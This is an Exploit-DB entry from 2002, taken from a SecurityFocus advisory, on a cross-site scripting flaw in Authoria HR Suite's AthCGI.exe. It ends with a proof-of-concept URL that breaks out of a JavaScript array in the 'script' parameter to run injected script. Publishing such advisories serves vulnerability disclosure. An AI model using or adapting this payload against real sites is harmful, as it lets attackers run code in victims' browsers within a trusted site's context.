Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting

EDB-ID:

21926


Author:

Max

Type:

webapps


Platform:

CGI

Date:

2002-10-09


source: https://www.securityfocus.com/bid/5932/info

Authoria HR Suite is prone to cross-site scripting attacks.

An attacker could construct a malicious link to a vulnerable host that contains arbitrary HTML and script code. If this link is visited by a web user, the attacker-supplied code will be rendered in their browser, in the security context of the vulnerable site.

https://www.example.com/path.to/cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('test!');a=[['